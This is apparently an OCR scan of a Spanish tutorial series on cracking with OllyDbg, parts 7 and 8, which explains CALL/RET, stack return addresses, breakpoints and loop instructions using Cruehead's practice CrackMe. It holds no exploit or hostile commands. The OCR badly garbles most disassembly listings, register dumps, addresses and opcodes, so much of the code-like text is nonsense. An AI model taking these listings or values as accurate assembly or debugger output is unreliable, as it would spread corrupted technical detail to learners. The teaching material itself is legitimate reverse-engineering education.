[: lass = "No need to disasm the codet” 
FindWindowA 


Backup » 
Copy » 
Binary » 
Assemble Space 
Label 

Comment As E codet” 
Breakpoint » 
Hit trace » 
Run trace » 
Follow in Dump » 
View call tree Ctrk 


Previos nrocedure 


Nos llevara a dicha dirección en el listado desensamblado, donde hay un CALL para practicar. 


BB4B1240| . 58 POP EAX 
BB4B1241| . 3BC3 CMP_EAX, EBX 
aBn401243| .v 74 B? 

BB4B1245. . ES 186010000 

bB4B124A| .* EB 9A 

0045 > ES FCODOBBB 

an4a »* EB 93 

0040 . [8 M000Bn ENTER 0,0 
0045 . 53 

an4a . 56 

an4a . 5? 

aB4B125A|]. 


PUSH EDI 
317D 6C 10011 CMP_ DWORD PTR SS: CEBP+CJ,110 


Allí vemos el CALL que elegí para practicar, para poder ejecutarlo hago CLICK DERECHO-NEW 
ORIGIN HERE con lo cual EIP apuntara a 401245 y dicha dirección será la próxima que se ejecutará. 


2803 CMP_EAX, EBX | 

74 07 

ES 18010000 

Es Fcoaaaaa Backup , 
Ca Bonena ; Copy » 
53 P Ñ 

ES Binary » 
s170 ec 1001 Assemble Space 
2170_ec 11011 CHP_Duoro PTA SS:LÉE — Label : 


837D ec 10  |CMP DWORD PTR SS: LEE ñ 

óFe4 a10000u Comment ; 

8170 60 61021 CMP_DWORD_PTR SS:LE : 

74 8c Breakpoint » 

BS 00000000 |MOU EAX, O b 

Ed POP EDI Hit trace » 
» 

5 Run trace 


PUSH Follow 


Deddress lHev dumn aSPTT on. co. 


Allí vemos como cambiamos EIP 


y 5) 
y 
o 
+ 


DA 
JD 


DA 
oo 


POP ERX 
3BC3 CMP_EAX, EBX 
74 B7 

Es 138610000 
EB 9A 

ES A 
C3 6B00BB ENTER 0,5 
53 PUSH EBX 


56 PUSH ESI 
57 PUSH EDI 


La instrucción CALL lo que hace es ir a ejecutar una subrutina o si quieren parte del programa cuya 
dirección esta dada por el valor del operando o sea en este caso del ejemplo: 


CALL 401362 significa que la próxima línea a ejecutarse será 401362 y cuando se termine de ejecutar la 
rutina que esta allí dentro, volverá a la instrucción siguiente a continuación del CALL que la llamo. 


En este ejemplo luego de ejecutarse el contenido del CALL 401362, volverá a 40124A y seguirá desde 
allí. 


Ahora hagamos unos ciertos movimientos con el OLLYDBG, que nos ayudan en los casos que estamos 
encima de un CALL como este. 


Si yo quiero mirar el contenido del CALL podría entrar al mismo con F7 y tracearlo por dentro, pero si 
quiero echar un vistazo a ver si el contenido me interesa para ser traceado o no, ya que también tengo 
como recuerdan la opción de tracear con la tecla F8, la cual en este caso ejecutara el CALL sin entrar al 
mismo y seguirá en 40124A sin ni siquiera enterarnos de lo que hizo el programa dentro del CALL. 


Entonces cada vez que llegamos a un CALL y estamos traceando un programa se plantea una disyuntiva, 
será importante para entrar a tracearlo con F7? O lo salteo con F8 porque es un call secundario que no 
hace nada que me importe? 


Bueno, lo que OLLYDBG nos permite hacer es mirar sin ejecutar, a ver que veo dentro del CALL y si me 
interesa. 


Para ello hago click derecho en el CALL y elijo FOLLOW. 


uuqulz - 3BL3 LIMP EHX,EBX 
6n401 e 74 B? 
a Es 18010000 


» 
Es ELosaoao Backup 
E Copy ' 
Binary » 
57 PUSH EDI 
¿17 ec 10011 CHP DWORD PTA Ss Assemble Space 


8170,ec 11814 CHP_DUORO PTA SS Label 
CHP_DWORO PTR SS Comment 


8370 6c 10 
OFS4 31000001 
3817D 6C B1021 CMP_DWORD_PTR SS 


4 6c Breakpoint » 
000000 , 

F Hit trace » 

Run trace » 


pl 
PUSH_6 


Go to 


FOLLOW no ejecuta ninguna línea solo va a mostrarnos la próxima línea a ejecutarse, pero no cambia 
nada EIP seguirá en 401245, a la espera de nuestra decisión. 


CEE HS > Ea E?) 


BeepType = MB_OK 
MessageBeep 
PUSH 30 St B_OKiMB_ ICONEXCLAMATION: MB_APPLMODAL 
PUSH CRACKNME. 00402160 No luckt” 
PUSH CRACKME. 00402169 E No luck there, matet” 
PUSH DIJORD PTR_SS: [EBP+8] 
MessageBoxA 
SI,DWORD PTR SS: [ESP+4] 


PUSH 
(MOU_AL,BYTE PTR DS:[ESI] 


Cuando entro a mirar veo la rutina interna que obviamente empieza en 401362 que era el operando del 
CALL y donde terminará, pues en el primer RET que vea en este caso OLLYDBG escribe los RET como 
RETN, pero es lo mismo dicha instrucción es la finalización de la rutina y la vuelta a 40124A a la 
instrucción siguiente del CALL que nos trajo aquí. 


Es muy importante entender esto, ahora que vimos como podemos mirar dentro sin ejecutar volvamos a la 
línea actual presionando la tecla - del teclado numérico o sea la tecla MENOS, esto siempre nos lleva al 


paso anterior sin ejecutar nada también. 


Pues estamos en el CALL 


58 FUE EHX 

. 3BC3 CMP_EAX, EBX 

.v 74 07? 

. ES 128010000 

.* EB 9A 

> ES FCoBBBBa 

“A MEB093 

. CS B0B0ma ENTER 0,0 

. 53 PUSH EBX 
0045012 . 56 PUSH ESI 


Ahora si entraremos con F7, pero antes de entrar el CALL veamos el stack, esto es muy importante pues 
allí se almacenan los datos para que el programa sepa donde regresar cuando llega al RET. 


En mi maquina este es el stack, en la suya los valores pueden variar pero el mecanismo será similar. 


Apreto F7 ahora 


244%] EM] 99 FEE 29) 95 O O O A O FI 7) 


BeepType = 
MessageBeep 
ES ME 0 me, ICONEXCLAMATION:MB_APPLMODAL 


ES ADoaBaDa 
6A 30 


Els] 
68 60214000 [PUSH CRACKME. 00402160 
PUSH CRACKME. 004982169 
FF7S 08 PUSH DWORD PTR_SS: [EBP+8] hOwnexr 
Es BDO0B0Ba MessageBoxA 
287424 04 MOU ESI,DWORD PTR SS: [ESP+4] 
56 PUSH ESI 
SADm6 prou AL,BYTE PTR DS: [ESIJ 
rrer al 


nana 


Allí entre en el CALL y estoy en 401362 pero a diferencia de la vez anterior que entre con FOLLOW 
ahora EIP cambio a 401362, lo cual quiere decir que estamos ejecutando esta rutina. 


Veamos que paso en el stack 


Allí en la imagen resalte el stack como estaba antes y veo que se agrego una nueva carta arriba o sea al 
entrar en un CALL el sistema automáticamente hace un PUSH con la dirección de retorno, o sea donde 
volverá al llegar al RET y salir de la rutina. 


Vemos que la línea tiene el valor 40124A que es como sabemos la dirección de retorno. 


Por si alguno lo olvido recordemos que es la dirección siguiente al CALL inicial, allí se ve. 
309, EHP_ERX, EBX 

ES Té010000 
ES FCobaBaa 
cs óaonoo ENTER 0,0 


53 PUSH EBXx 
56 PUSH ESI 


Bueno vemos que OLLY nos aclara aun mas el tema agregándonos información. 


00640124A] RETURN to CRACKME.B040124A from CRACKME. 06401362 
2FFC4 7C816D4F | RETURN_to O 7C816D4F 
'FFCS| 7C920738|ntdll.7C9207 
FER] FFFFFFFF 


Jul > 


61 
bn12 
AR? 


Nos dice RETORNO A 40124A desde 401362 


O sea OLLY aun no sabe donde estará el RET que nos devolverá, pero sabe que la rutina empieza en 
401362 y lo marca como que aquí empieza y terminara en un RET y volverá a 40124A. 


Apretemos F7 una vez vemos que ejecuta un PUSH 0 lo cual pone un CERO en el stack y abajo del 
mismo queda el indicador para el RET de la dirección de retorno. 


60004B00 Lose lupe = MB_OK 

B040124A| RETURN to CRACKME. a from CRACKME. 60401362 
7C816D4F| RETURN to kerne132.7C81604F 
7C920738|ntdll.7C920738 

FFFFFFFF 
7FFD600a 
3054A933 
BO12FFCS 
34413928 
FFFFFFFF End of SEH chain 
7C8399F3| SE handler 
7C3816D53| kerne 132. 70816058 
15J5]515]5]5]5]5] 
15J5]515]5]5]5]5] 
19J0J5)01:121215] 
00401000) CRACKME. <Modu leEntryPoint > 
B00BBB0a 


| 
[| > 


El programa puede hacer mil operaciones dentro de la rutina hacer miles de PUSH, POPS lo que quiera, 
pero al llegar al RET deberá dejar arriba en el stack nuevamente el valor de la dirección de retorno, 
sigamos ejecutando con F8 para no entrar en los CALL y llegar al RET. 


ECERCONCE EEES TEE EEES Ela 


PUSH B (esalves = MB_O0k 
Ele 
PUSH 30 MB OKiMB_ ICOR JEXCLAMATION:MB_APPLMODAL 
PUSH CRACKME. 60402160 "wo Luck?” 
PUSH CRACKME. 00402169 Te "No luck there, matet” 
PUSH DWORD PTR SS: [EBP+8] hOwner 
MessageBoxA 


MOU ESI, DWORD PTR SS: [ESP+4] 
PUSH ESI 


ñ 5 Ñ o e emMniit fi DUTE DTD MCs. TECTA 


Allí llegue al RET y veo que como dije el stack tiene arriba nuevamente el valor donde retornara. 


o: 


JR RN to CRACKME.6048124A fro 
trop RETURN to kernel32.7C816D4F 
7C920738|ntdll.7C920738 
FFFFFFFF 
7FFD6000 
80544938 
BO12FFCS 
84413928 
FFFFFFFF End pe E chain 
7C8399F3|SE ha 
pes 8059 os Pcs16D58 


mía 


a a 
B FFS| 604901000/ CRACKME. <Modu leEntryPoint > 
BO12FFFC| 000BBB0a 


Como habíamos mencionado el RET es el final de la rutina y contrapartida de la instrucción CALL, si 
CALL nos trajo aquí, RET nos devolverá a la zona donde estábamos antes de entrar en esta rutina. 


Pero además RET quitara la dirección de retorno del stack que es un valor que al sistema ya no le interesa 
pues ya volvemos y luego la dirección ya no es útil más. 


Apreto F7 


CMP EAX, EBX 


ENTER 0,0 
PIUISH FRY 


YCs16D4F|RETURN_to kernel32.rC381604F 
YC920738|ntdll.7C920738 


mAs 


Prerrrrrrir.d .f CP <holo 


Es de mencionar que si uno ejecuta un RET sin haber entrado en ningún call por ejemplo 


PUSH 401256 
RET 


Lo que hará esto es poner en el primer lugar del stack el valor 401256, y como la siguiente instrucción es 
un RET, pues ella interpreta que el primer lugar del stack es una dirección de retorno de algún call 
anterior y aunque ello no haya ocurrido, al ejecutarlo nos llevara allí. 


Ahora reinicio el CRACKME DE CRUEHEAD 


Ahora haré otro ejemplo voy en el listado con GO TO — EXPRESSION a 401364 es una dirección que 
elegí para mostrar algo ya verán. 


ES U7vUVOVuVYU 


OS *MESS3JEDORH 


6A Ba PUSH O AS = MB_OK 

Es ADOBBBAB MessageBeep 

6A 30 Style = MB_OKIMB_ ICONEXCLAMATION: MB_APPLMODAL 
PUSH  RACKNE. 00402160 Title = "No luck? 
PUSH CRACKNME. 164902169 Test = "No luck there, matet” 

FF7S 68 PUSH DWORD PTR_SS: [EBP+8] hOwner 

Es BDO0BB0Ba MessageBoxA 


Cc3 
8B7424 04 MOU ESI, DWORD PTR SS: [ESP+4] 


Ahora no cambiare EIP ni nada si no que apretare F2 que es un BREAKPOINT los cuales ya 
explicaremos mas adelante en detalle, lo importante es que cuando el programa ejecute esa instrucción 
OLLYDBG parara allí. 


FF7S 68 PUSH DWORD PTR SS: [EBP+8] hOwner 

ES elala5151915] MessageBoxA 

£A Ba PUSH a pEssotyps > = MB_OK 

ES ADO SOT 

6A 30 MB_OKiMB_ ICONEXCLAMAT ION: MB_APPLMODAL 


= "No luck?t 

. = "No luck there, matet” 
hOwnexr 
MessageBoxA 


PUSH CRACKME. 00402169 
PUSH DWORD PTR SS: [EBP+8] 


PUSH 30 
68 60214900 [PUSH CRACKNME. 00402160 
68 69214000 
FF7S 68 
ES BDGG0DDO 
5 $B7424 D4 
+ 56 


MOU ESI,DWORD PTR SS: [ESP+4] 
PUSH ESÍ 


Allí esta puesto el BREAKPOINT ahora apreto F9 que es RUN para que el programa corra. 


File Help 


Vemos que nos sale la ventana del crackme, si no la ven, pues búsquenla con ALT mas TAB entre los 
programas que están corriendo. 


Allí se ve, el programa no paso aun por nuestro BREAKPOINT, vayamos en dicha ventanita a HELP - 
REGISTER 


CrackMe v1.0 


Pongamos cualquiera 


Register 


Narne Iricnard56 
Serial [989898 dl 


OK | Cancel | 


Y apreto OK 


A No luck there, mate! 


Nos sale una ventanita diciendo que no tuvimos suerte o sea que tipeamos el user y serial incorrecto (lo 
increíble seria que fuera el correcto jeje), y al aceptar dicha ventana para en nuestro BREAKPOINT. 


Si no les para prueben con el user y serial que puse yo. 


rrro U5 FU>SHA UWURUO FIAR D33LEDr+roJ | Errsapl 
ES D900000a MessageBoxA 
5A Ba PUSH a esa an = MB_OK 
Es ADOGABAB MessageBe 
6A 30 PUSH 30 Style = ME OK:MB_ ICONEXCLAMATION :MB_APPLMODAL 
62 60214000 | PUSH CRACKME. 004021609 Title = "No luck? 
68 69214000 |PUSH CRACKME. 004902169 Text = "No luck there, matet” 
a FF?S 08 PUSH DWORD PTR SS: [EBP+8] hOwner 
a ES (051515151515) MessageBoxA 
15] A 
a 5 28B7424 04 MOU ESI,DWORD PTR SS: [ESP+4] 
a E 6 PUSH ESI 
e Onil emi MM DUTE DTD MC. TECSTA 


A PEE, 00000000 Loccolupe = MB_O 
2 /0012FER6/L0040124APRETURN to CRACKMEY10O40124A (from CRACKME. 60401362 
3 0012FEA4 ASCII "RICNAR456” 
h 


Do 
DO 


BO12FF1C 
bo4u1123 


770138734 
B91EBSA6 
60000111 
fajolslalalc13 
1 (5J515]5]515]515] 
1 B0401128| RETURN to CRACKME. lIndProc from <JMP. KERNEL32.Ex ¡tProcess> 
1 DCBARECO 
1 jaja]9]51515]515) 
1 BB12FF1C 
- ETA RETURN to CRACKME. lindProc from <JMP. $¿KERNEL32. Ex ¡itProcess> 
12FEE4/] 77D18816| RETURN to USER32.77D18816 from USER32.77D1870C 

12FEES|] 004011283| RETURN to CRACKME. lndProc from <JMP. ¿KERNEL32. Ex ¡tProcess> 
A B91EDSA6 
1 

1 

1 

1 

1 

1 

1 

1 


2FEAS| BOBBDBOS 
2 RETURN to[cñackne,undProj from <JMP. 8¿KERNEL32. Ex ¡itProcess> 
RETURN to USER32. 77018734 


y 


DO 
POr 
—m 
m 
) 
0 


Y 


DI 
OOO 


DDD 
De 


¡DEE 
A 


2FEFO|| 090000111 
2FEF4|| 000BBB5S 
2FEFS|| 6OBBBBaAa 
2FEFC|| 00402050 | CRACKME. 004902050 
2FF00|| BO402043| CRACKME. BO0402043 
2FF64|| BBGDEFCO 
2FF63|| 000BBB14 
2FF6C |] 0000001 
SERIAL ARARARAA 


IDO 
Lia 


y 
€ 


Vemos allí unos cuantos RETURN TO .... Que el stack tiene almacenados allí, así que podemos pensar 
que el superior de todos, será donde volverá el programa al llegar a un RET ya que suponemos estamos 
dentro de un CALL (porque vemos que hay RETURN TO ...... en el stack ) y al llegar a un RET ese 
RETURN quedara en la línea superior y volverá a 40124A . 


Como vemos también estamos en la misma rutina que analizamos antes cambiando el EIP, pero ahora 
dentro de la ejecución el programa, no suelta. 


Tratamos de llegar al RET apretando F8 como antes, en el call anterior al RET se para ya que nos debe 
mostrar algo que hace el CALL dentro que es una mensaje y que debemos aceptar para seguir. 


No luck! 


bd Er PUESTA 

] PUSH OB [RespTyps = MB_Ok 

CALL <JMP. 2 USER32. MessageBeep> MessageBeep 
aBn4b 5 PUSH 38 Style = MB_OKiMB_: 
0045 5 PUSH CRACKME. 66402160 Title = "No luck*" 
0040 , PUSH CRACKME. 66402169 Text = "No luck tt 
0040 E PUSH DWORD PTR SS: [EBP+8] h Owner 

5 MessageBoxA 

f* 3B7r424 M4 MOU ESI, DWORD PTR SS: [ESP+4] 
A PIUISH FEST 


ACKME. 


URN to CR b046124A from CRACKME. 06461362 
ASCII "RICNAR4S6” 


1 


ba4a1123 
BB12FEEG 
770138734 
1B91E0SA6 
00000111 
BABBBDES 
da 


RETURN to CRACKME. lindProc from <JMP. 8KERNEL32. Ex itProcess 
RETURN to USER32. 77018734 


E 


y 


y 
Lado 


La diferencia entre la vez anterior y esta es que la vez anterior al cambiar EIP e ir directamente allí, 
ejecutamos el CALL solo aislado, no el resto del programa, ahora al poner un BREAKPOINT el 
programa se ejecuto normalmente, y al pasar por allí paro, y si apreto F9 seguirá corriendo como si nada. 


CrackMe v1.0 Lx] 


File Help 


Además lo que quise mostrar es que a veces cuando estamos en el medio de la ejecución de un programa 
y paramos por algún motivo, la información del stack nos sirve para saber de donde fue llamado la rutina 
en que estamos y donde volverá, y si hay mas RETURN TO hacia abajo, también sabremos que son 
CALLES unos dentro de otros, o sea anidados, y que estamos dentro de un CALL que al llegar al primer 
RETURN TO, saldremos y al llegar al segundo pues saldremos de otro y así. 


Creo que esta claro, igual como es muy importante que entiendan esto aclararemos con otro ejemplo 
reiniciemos el OLLY y apretamos la barra espaciadora y escribamos como primera línea solo para 
entender esto CALL 401245 


Assemble at 00401000 


CALL CRACKME. 660461245 
NOP 


NOP 
Le DWORD PTR DS: [4020CA7,EAX 


: 6A BB PUSH 0 Tit 

. 683 F4204006 | PUSH CRACKME. BB4B020F4 (cis: 

. ES A6040006 Finc 
ADA no Envy Env h 


Alli esta ahora podemos practicar hacer FOLLOW para la rutina por dentro 


mex] eli] vilvi $0] +] 1Jejmjriwu[c]oJk]e]e]-[s)] ¿5131?] 


ENTER 6,6 


CMP_DWORD_PTR SS: [EBP+C],10 
CMP_ DWORD _PTR SS: [EBP+C],201 


ie 

Vemos que como modificamos el programa la rutina ahora empieza en 401245 y terminara en el RET de 
401288 (que es un RETN10 un poco diferente a un RET común, pero no es eso el tema de esta 
explicación ya lo veremos mas adelante lo que quiero que vean es lo que pasa cuando entramos en un call 
como en este caso y dentro de la rutina entramos en un segundo CALL. 


Bueno ya hicimos FOLLOW y miramos ahora apretemos MENOS para volver y ahora si apretemos F7 
para entrar ejecutando. 


a 


E 9A 
FCcobaBoaa 
B 93 
B000Ba ENTER 0,0 
3 PUSH EBX 
PUSH ESI 


57 PUSH EDI 
317D 6C 10011 CMP_DWORD _PTR SS: [EBP+CJ,110 


74 34 
a 11611 CMP_OWORD_PTR SS: [EBP+CJ,111 
.« 8370 6C 16 [CMP OWORD PTR SS: [EBP+C1,10 


«y BFS4 ies 
. 817D 6C 601021 CMP_ DWORD PTR SS: [EBP+C],261 


DO 


Dar Y 
pr pr pr jr e Jr rd Jr fe rd fr pd pr pu 


74 BC 
22 GARRRRAR MAIL FOXY A 


Allí estamos y EIP apunta a 401245 que es la próxima instrucción a ejecutarse 


A |Registers (FPU) 
——JEAX BOBBBBDa 

ECX BO12FFBO 

EDX 7C91EB94 ntdl 
EBX 7FFDSO0a 
ESP BO12FFCO 
EBP BO12FFFO 
ESI FFFFFFFF 
70920738 


Bu4bB1245 


CS bB1B 
Ae SS[R823 S2bi 


Y en el stack vemos que en el primer lugar esta el valor de retorno a la línea siguiente del call que 
escribimos a mano. 


paoso1s Aa RACKME. 00401665 
pe RI Aral to o .1Cs16D4F 


[mes 


ECECECCCE! End «£ COL him 


Vemos que el valor esta, pero OLLYDBG no nos aclaro RETURN TO 401005, porque ocurre esto, es 
bueno entenderlo para saber como funciona OLLYDBG, como nosotros agregamos el CALL después del 
análisis inicial que el OLLYDBG había hecho, pues de esta forma, le hemos cambiado el caballo en el 
medio del río y lo hicimos ahogar jeje, por lo cual si queremos arreglarlo, debemos hacer en el listado en 
cualquier línea CLICK DERECHO- ANALICE CODE, con lo cual lo volverá a pensar después de los 
cambios que hemos introducido. 


s7 PUSH_EDI 
$817D 6C 10011 CMP DWORD PTR SS: [EBP+CJ,110 


817D_0C 11011 CMP DWORD PTR SS: [EBP+CJ],111 

837D 6c 18 |CMP DWORD _PTR SS: [EBP+C],18 
JE CRACKME amAñ12E7 

8170 _0C ta! CHP 


pora 


a: 


74 Backup Ñ 
Ba Bguaaaaa [MOV El 
Ed POP El Copy » 
SE POP ES : 
5B POP Ef Binary » 
62 1000 BEN: 
EA 01  Assemble Space AE 


NULL 


PUSH é 
FF7S_08 push. e Label 
Es ESa10000 | CALL* 


PusH 1 Comment ; fal idateRect 


Et Breakpoint » Focus 

3170 10 Eeoal| Che 1 Hit trace » 
8170 10 EAG3 Eee Run trace » 
d8 68 USA - 
A Enter les eve pasee 
ES 07020000 New origin here CtrkGray * DigItenTentA 
C745 16 EBO3 Go to » 

Follow in Durmp » 

View call tree CtrHK 

Search for » 

Find references to » 

View » 

Copy to executable » 

Pp > 


2+5 from CRACKME. 60401245 


IS 


mes 


df 


oo ale 


End of SEH chain 


?7OSaAQE21 SE k=andlarm 


Bueno nos dijo que volverá a MODULE ENTRY POINT +5 


Dicho valor es 401000 que era el ENTRY POINT mas 5 =401005 


Es muy importante esto porque muchas veces uno le dice a una persona que le pide consejo, fíjate los 
RETURN TO ...... en el stack, pero resulta que uno mismo ha modificado cosas o el mismo programa se 
ha auto modificado al ejecutarse entonces el análisis inicial del OLLYDBG fallara en las aclaraciones y 
debemos actualizarlo al detenernos, o quitar el análisis como vimos si nos trae problemas en la parte 1. 


Bueno aclarado esto volvemos a donde estábamos 


RETURN to RE from CRACKME, 1664601362 
RETURN to € EntryPoint >+5g from CRACKME. 66461245 
RETUR 

ntdll. 


a 
24 
F 


NOD 


End of SEH chain 
SE handl 


kerne 132. 7C816D58 


FEFFFF 


DA 


Lado 


CRACKNME. <Modu leEntryPoint 


Vemos que arriba de donde guardo la dirección de retorno del primer call ahora guarda la segunda 
dirección de retorno de este, en este caso están consecutivos, pero podría haber valores numéricos 
intermedios productos de PUSH o operaciones diversas, lo importante es que el primer RETURN TO .. 
que hallamos de arriba hacia abajo es la dirección de retorno del ultimo CALL que entramos y la segunda 
que hallemos bajando será la dirección de retorno del call anterior que es el inicial que escribimos. 


Esta es la idea de calls anidados o uno dentro de otro, si yo por poner un BREAKPOINT o por algún 
motivo parara aquí en el medio de la ejecución del programa, aunque no haya venido traceando ni tuviera 


información de cómo se vino ejecutando el programa al ver el stack , puedo sacar como conclusión 


1) CAI AQUÍ Y VEO UN RET un poco mas abajo, supongo que estaré dentro de un CALL para 
confirmarlo miro el stack 


CCE Ca EEE +40) + 1J2)m)1)w)5 c Jx)8)R]»-s] 


PUSH rn = MB_0K 

CALL <JMP. .USER32. MessageBeep> MessageBeep 

PUSH 30 Stule = MB_OK;¡MB_ ICONEX 
PUSH CRACKME. 60402160 Title = "No luck?” 

PUSH CRACKME. 64402169 Text = "No luck there, m 
PUSH DWORD PTR SS: [EBP+8] hOwner 


EOS MessageBoxA 


MOU ESI,DWORD PTR SS: [ESP+4] 
PUSH ESI 

MOV AL,BYTE PTR DS: [ESI] 
TEST AL,A 


pasat 


2) MIRO EL STACK 


0) 
G 
z 
a 
+ 
o 
¿0 
DD 
DD 
O 
A 
pd 
m 
o 
o 
) e 
O 
pur 
rm 
y 
D 
+ 
3 
o 
03 
-- E 
pes] 
D 
O 
RH 
== 
5 
5 
) 
a! 
o 
+ pa 
O 


— 001 00 CR CKME Ear EntryPoint +5 from CRAC KME. 60604561245 
[515] Ae 132. 7C81604F 
=0100 3 
— 106 
an 
15] 
Ba 
1515] 
[5]5] End of SEH chain 
515] 3|SE handler 
an erne132.7C316D58 
1515) 
Ba 
Ba 
[515] CRACKNME. <Modu leEntryPoint 
an 


Al mirarlo y buscar desde arriba del stack hacia abajo y hallar el primer RETURN TO se que el programa 
al llegar al RET volverá a 40124A. 


3803 CUP EAX, EBX 
97 


7 243 4 
Bu4012 5 [Es 18010000 
a ."*EB 9A 
a > ES FCOBOBBn 
A4É “ EB 


93 
C3 600005 ENTER 0,0 


Dala 


y 


s17D ac 10011 CMP DUORO PTR SS: : [EBP+C1, 110 


Y además de saber donde volverá se que estoy dentro de la ejecución del CALL ANTERIOR al punto de 
retorno, o sea que el programa llamo a la zona donde estoy desde 401245 usando un CALL que llama a la 
rutina de 401362. 


Y no solo se eso si no que se también que antes de llegar a ese CALL, había entrado antes en otro ya que 
hay otro RETURN TO .... Mas abajo 


0040124AL RETURN to CRACKME.60640124A from CRACKME. 606401362 
B0401005 JRETURN to ATACA from CRACKME. 604012 


7C920738|ntdll.7C920738 
FFFFFFFF 


* Taat2FFCa 


6B12FFC4 
ou12FFCS 
ab12FFCC 


Ese me informa que luego de ejecutar todo saldrá a 401005 y además se que el programa provenía del 
CALL de la línea anterior o sea 


El Hle View a. ES Options Window Help 


3 40020000 f CALI CRACKME. EQU 


NOP 
Pus DWORD PTR DS: [4020CA7,EAX 


$5 


ls] PUSH B Ti 
68 F4204000 |PUSH CRACKME. 004020F4 E 
A6040009 | CALL <JMP. £USER32. FindllindowA> Fi 


Solo parando y mirando el stack ya determine que el programa provino de aquí que entro en ese call, 
luego fue a 401245, allí había otro call que me llevo a 401362 y de esa forma llegue a la zona donde 
estoy. 


Esa forma de pensar en el cracking es muy útil porque me hace reconstruir la forma que el programa fue 
llegando a cierto punto, que muchas veces no son dos calls uno dentro de otro si no que hay 30 calls uno 
dentro de otro y uno no puede tracearlos todos, así que si caigo en un punto, puedo hacer un análisis 
personal, y llegar a la conclusión de cómo el programa arribo al punto donde me encuentro en este 
momento. 


Espero que haya quedado claro, lo de los CALL Y RETS les sugiero practicarlos repasarlo, si tienen 
dudas preguntar porque esto es muy importante, iba a terminar a continuación con los métodos de 


direccionamientos y algunas instrucciones que quedaron en el tintero, pero preferiría que le den buena 
importancia a entender esto y en la próxima parte continuamos con los temas pendientes. 


Hasta la parte 8 
Ricardo Narvaja 
18 de noviembre de 2005 


INTRODUCCIÓN AL CRACKING EN OLLYDBG PARTE 8 


Trataremos en esta parte de ver rápidamente algunas instrucciones importantes para el cracking que nos 
quedaron en el tintero para terminar con las mismas y empezar a crackear. 


INTRUCCIONES PARA LOOPS O CICLOS 

Ciertamente se pueden realizar ciclos en un programa con las instrucciones ya vistas o sea ejecutando 
varias instrucciones, poniendo un contador por ejemplo en ECX y al final una comparación de si es cero y 
un salto condicional que si no es cero vuelva a repetirse el ciclo se disminuya ECX y así se repetirá hasta 


que ECX sea cero seria algo así: 


Xor ECX,ECX 
Add ECX,15 


Eso seria para inicializar el contador de nuestro loop que sera puesto a 15, aquí comienza el LOOP en si 


DEC ECX 

Para disminuir ECX cada vez que se ejecute el loop 

Luego la ejecución de las instrucciones que se deben repetir 
Y luego 


TEST ECX,ECX 
JNE salta hacia el inicio del LOOP 


O sea que al testear si ECX es cero la primera vez será 14 ya que lo decremente una vez y al no ser cero 
volverá a repetirse, y así se repetirá hasta que ECX sea cero donde saldrá fuera del LOOP y continuará 
con la instrucción siguiente. 


Escribámoslo en OLLYDBG 


El ul eje] $) + ajeja BR 
5 XOR ECX, ECX 

ADD ECx, 15 

NOP 


Soo ae 


a10 


Allí lo vemos la zona resaltada en amarillo es el loop en si, que se repetirá hasta que ECX sea cero, y 
entre 401008 y 40100C se deberían escribir las instrucciones que el programa desea repetir que aquí no 
interesan pues solo vemos el mecanismo de iteración del LOOP por eso dejamos NOBS alli. 


Si lo traceamos vemos que al apretar F7, ECX se pone a cero 


JTNDDAA 
o NOS” 


ESI FFFFFF 
EDI 7 td 


EIP Lian CRA 


Luego apreto f7 hasta llegar al DEC ECX el cual al ejecutarlo pone ECX en 14 


Luego llegamos hasta la comparación TEST ECX,ECX que sabemos que verifica si ECX es cero 


X] PP) vi 9 $34 Y] 3) IE] M4) DJ Y] 8 6 Y] E] BJ E 
XOR ECX, ECX 
ADD ECx, 15 
NOP 


0055 
ER 
5500 
20m 


WN 
TEST _ECX 
ya 2 SHORT CRACKNE. BO4B10B7 


20 
b Ane 


Al no ser cero no se activa el FLAG Z y el JNZ salta hacia 401007, donde vuelve a decrementar ECX 
quedando en 13, puedo tracear así haciendo los loops hasta llegar al momento que ECX vale CERO 


Vemos que al ejecutar la comparación con ECX igual a cero se activa el FLAG Z lo que hace que el JNZ 
no salte 


DI 7? 3 : 
IP apio CRACKNE.. £ 
a la] bit F 

1 a bit atF 

> - E 

F 

F 


o 
E 
JO 


Nodo 
on 
Ranma 


OOFANMNDDO mm 


astErr ERROR_MO[ 


246 (NO,NB,E, 


-UNORM BCES 
9.0 


- ñ MANRAHNHAAL 


Recordemos que JNZ es el inverso de JZ que saltaba cuando se activaba el FLAG Z, el JNZ es el opuesto 
no salta cuando se activa el FLAG Z. 


ed] Ema val $18) 1 1J2)m]1/w)n] c) /x]8/8].. 5] 


XOR ECX, ECX 
ADD ECx, 15 


DOE 
purgar 


DEC ECX 


a Ln En fs fs Ss fa E Ea 
DO 
a 

0000 

TUDO 


N 
TEST _ECxX,ECX 
yz SHORT CRACKME. 004010907 


ño 
20 NOP 
|: ES A6040000 | CALL —<JMP.RUSERS2.FindilindowA> ULFindWindowA 
- MRRA MR FAX. FAX 


Allí lo vemos la flecha en gris indica que no va a saltar, al apretar F7 nuevamente sale del loop a la 
instrucción siguiente 


[Hd A a A A MU 


0040 3309 XOR ECX, ECX 
0040 3301 15 ADD ECX, 15 
au40 [2] NOP 
Bu40 90 NOP 
40 49 DEC ECXx 
40 94 NOP 
40 20 NOP 
4 1] NOP 
4 20 NOP 
4 2509 TEST _ECX,EC%x 
a0n4 ES) re JNZ SHORT CRACKME. 00401907 
004016 90 NOP 
604501511 290 NOP 
Ba4B1B12 90 NOP 
0n401613 | . ES A60490009 | CALL <JMP. SUSERS2.FindilindowA> UF indllindowA 
andaA1a1a ARPA Me Foxy FO 


Esa seria una forma sencilla de loop con las instrucciones ya vistas, aunque hay instrucciones especiales 
para eso. 


LOOP 


La instrucción LOOP nos ayuda a hacer algunas de las tareas que vimos en el ejemplo anterior, 
reemplazamos 


EXE +0) els 80) +9 1jejmjrjwjnjejz 


90491 3309 XOR ECX, ECX 
4. ECx, 15 


N 
A SHORT CRACKME. 06401007 


NOP 
NOP 


En donde estaba DEC ECX hacemos CLICK DERECHO — BINARY NOP con los cual NOPEARA esa 
instrucción, lo mismo donde estaban TEST ECX,ECX y JNZ 401007, todas esas instrucciones pueden ser 
reemplazadas por una sola que es la INSTRUCCIÓN LOOP la cual compara si ECX es cero, si no lo es 
salta al operando en este caso 401007 y además decrementa ECX . 


Hagamos en la primera línea, CLICK DERECHO-NEW ORIGIN HERE para ejecutar mi nuevo LOOP. 


Vemos que al apretar f7 pone ECX a cero luego le suma 15 igual que antes para marcar la cantidad de 
iteraciones o repeticiones. 


Ahora traceo y llego hasta la instrucción LOOP 


